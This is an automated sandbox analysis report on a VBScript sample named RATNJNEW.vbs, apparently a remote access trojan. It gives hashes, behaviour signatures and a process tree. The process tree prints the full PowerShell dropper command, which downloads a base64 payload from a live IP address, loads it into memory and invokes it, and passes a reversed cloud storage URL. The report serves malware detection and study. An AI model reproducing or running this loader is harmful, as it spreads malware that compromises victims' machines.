Analysis
- max time kernel: 412s
- max time network: 415s
- platform: windows7_x64
- resource: win7-20220812-en
- resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
- submitted: 26/09/2022, 22:08

Static task: static1
Behavioral task: behavioral1
- Sample: RATNJNEW.vbs
- Resource: win7-20220812-en
- 5 signatures
- 600 seconds
General
- Target: RATNJNEW.vbs
- Size: 577KB
- MD5: 0673849361f4aa0726bc1e4704c3dc4b
- SHA1: 76acf5375646a1885c361ca1838fa00c8e721ee2
- SHA256: b5732644184a1479c4fb17380de98dfa1ffe6135914aecdf960e34b96fd076bb
- SHA512: e7f67d92bc4b2ba7382af9f46b7f2d59869c6f3730d96575ac73d2d1a561e7c5fc1a82cc7537b13fa8eadaa0240d19484401972bd6b1e0b950a15e9b980890e9
- SSDEEP: 96:vHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHY:cKLosx0yRG
- Score: 10/10
Malware Config
- Extracted
- Language: ps1
- Deobfuscated
- URLs (ps1.dropper): http://20.7.14.99/dll/dll_ink.pdf
Signatures
- Blocklisted process makes network request (1 IoCs)
  flow  pid  Process
  3     964  powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid  Process
  964  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid  Process
  Token: SeDebugPrivilege  964  powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  description                       pid   Process      procid_target
  PID 1192 wrote to memory of 964   1192  WScript.exe  27
  PID 1192 wrote to memory of 964   1192  WScript.exe  27
  PID 1192 wrote to memory of 964   1192  WScript.exe  27
Processes
- Level 1: C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RATNJNEW.vbs"
  - Suspicious use of WriteProcessMemory
  PID: 1192
  - Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('1f6af02f9651-8cc9-7024-3ac8-2284e82a=nekot&aidem=tla?txt.saCtarJN02%4602%esabF2%4602%esab/o/moc.topsppa.ooomiisiisipaug/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 964